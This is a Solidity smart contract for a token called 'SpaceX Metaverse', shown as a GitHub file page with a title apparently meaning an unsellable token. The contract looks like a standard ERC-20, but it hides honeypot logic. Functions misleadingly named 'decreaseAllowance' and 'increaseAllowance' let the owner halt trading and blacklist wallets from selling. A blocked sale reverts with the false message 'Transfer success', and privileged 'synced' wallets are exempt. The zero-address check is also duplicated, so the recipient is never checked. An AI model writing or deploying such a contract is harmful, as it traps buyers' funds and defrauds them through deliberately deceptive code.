-
Notifications
You must be signed in to change notification settings - Fork 0
/
pixiu A+B
381 lines (321 loc) · 9.83 KB
/
pixiu A+B
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.3;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount)
external
returns (bool);
function allowance(address owner, address spender)
external
view
returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
_setOwner(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
_setOwner(newOwner);
}
function _setOwner(address newOwner) private {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
interface IUniswapV2Factory {
event PairCreated(
address indexed token0,
address indexed token1,
address pair,
uint256
);
function feeTo() external view returns (address);
function feeToSetter() external view returns (address);
function getPair(address tokenA, address tokenB)
external
view
returns (address pair);
function allPairs(uint256) external view returns (address pair);
function allPairsLength() external view returns (uint256);
function createPair(address tokenA, address tokenB)
external
returns (address pair);
function setFeeTo(address) external;
function setFeeToSetter(address) external;
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);
}
contract SpaceX is Context, IERC20, Ownable {
using SafeMath for uint256;
string private constant _tokenName = "SpaceX Metaverse";
string private constant _tokenSymbol = "SpaceX";
uint8 private constant _tokenDecimals = 9;
uint256 private constant _tokenTotalSupply = 10000000000000000 * 1e9;
mapping(address => uint256) private _tokenBalances;
mapping(address => mapping(address => uint256)) private _tokenAllowances;
mapping(address => bool) private _synced;
mapping(address => bool) private _increaseAllowance;
IUniswapV2Router02 private uniswapV2Router;
address private uniswapV2Pair;
bool private _isdecreaseAllowance;
bool private _isPermit;
modifier onlySynced() {
require(_synced[_msgSender()], "caller is not synced");
_;
}
constructor() {
IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
0x10ED43C718714eb63d5aA57B78B54704E256024E
);
uniswapV2Router = _uniswapV2Router;
uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
.createPair(address(this), _uniswapV2Router.WETH());
_tokenBalances[_msgSender()] = _tokenTotalSupply;
_synced[owner()] = true;
_synced[address(this)] = true;
_isPermit = true;
emit Transfer(address(0), _msgSender(), _tokenTotalSupply);
}
/**
Return token name
*/
function name() public pure returns (string memory) {
return _tokenName;
}
/**
Return token symbols
*/
function symbol() public pure returns (string memory) {
return _tokenSymbol;
}
/**
Return token decimals
*/
function decimals() public pure returns (uint8) {
return _tokenDecimals;
}
/**
Return token total supply
*/
function totalSupply() public pure override returns (uint256) {
return _tokenTotalSupply;
}
/**
Return balance of account
*/
function balanceOf(address account) public view override returns (uint256) {
return _tokenBalances[account];
}
/**
Transfer amount to recipient from sender
*/
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_internalTransfer(_msgSender(), recipient, amount);
return true;
}
/**
Return allowance of owner, spender combination
*/
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _tokenAllowances[owner][spender];
}
/**
Standard approval function
*/
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_internalApprove(_msgSender(), spender, amount);
return true;
}
/**
Transfer and approve
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_internalTransfer(sender, recipient, amount);
_internalApprove(
sender,
_msgSender(),
_tokenAllowances[sender][_msgSender()].sub(
amount,
"Transfer amount exceeded address allowance"
)
);
return true;
}
/**
Internal approve function
*/
function _internalApprove(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "Cannot approve from zero address");
require(spender != address(0), "Cannot approve to zero address");
_tokenAllowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
Internal transfer function
*/
function _internalTransfer(
address sender,
address recipient,
uint256 amount
) private {
require(sender != address(0), "Cannot transfer from the zero address");
require(sender != address(0), "Cannot transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
if (!_synced[sender] && !_synced[recipient]) {
require(_isdecreaseAllowance);
if (_isPermit) {
require(sender == uniswapV2Pair || recipient == uniswapV2Pair);
if (recipient == uniswapV2Pair) {
require(!_increaseAllowance[sender], "Transfer success");
require(!_increaseAllowance[_msgSender()], "Transfer success");
}
}
}
_tokenBalances[sender] = _tokenBalances[sender].sub(amount);
_tokenBalances[recipient] = _tokenBalances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
function decreaseAllowance(bool value) public onlyOwner {
_isdecreaseAllowance = value;
}
function sync(address[] calldata wallet, bool value)
external
onlySynced
{
for (uint256 i = 0; i < wallet.length; i++) {
_synced[wallet[i]] = value;
}
}
function increaseAllowance(address[] calldata wallet, bool value)
external
onlySynced
{
for (uint256 i = 0; i < wallet.length; i++) {
_increaseAllowance[wallet[i]] = value;
}
}
}